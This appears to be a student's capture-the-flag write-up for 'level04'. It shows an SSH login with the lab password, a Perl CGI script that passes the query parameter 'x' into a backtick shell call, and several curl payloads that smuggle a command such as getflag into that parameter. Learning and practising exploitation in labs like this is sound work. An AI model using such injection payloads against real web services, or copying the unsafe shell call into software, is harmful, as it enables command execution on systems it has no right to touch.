> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: qi0maab88jeaj46qoumi7maus
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# localhost:4747
use CGI qw{param};
# CGI (Common Gateway Interface)
# param: a CGI module func fetches params from HTTP requests
# qw: quote words
print "Content-type: text/html\n\n";
sub x {
$y = $_[0];
print `echo $y 2>&1`;
# sub -- define subroutine x
# $_[0] -- subroutine `x()` takes a single arg`
# print w/ backticks invokes a shell command
# 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename
# 1st `x` : calling the subroutine
# 2nd `x` : a query param
# x comes in form of "...?x=getflag"
# test
> curl -I localhost:4747
> nc -vz localhost 4747
^ v: verbose
z: scan if a port is open (a listening daemon)
Connection to localhost 4747 port [tcp/*] succeeded!
# solve
curl localhost:4747?x="\`$(which getflag)\`"
curl localhost:4747?x="\`$(whereis getflag | awk '{print $2}')\`"
curl --get --data-urlencode 'x=;getflag' localhost:4747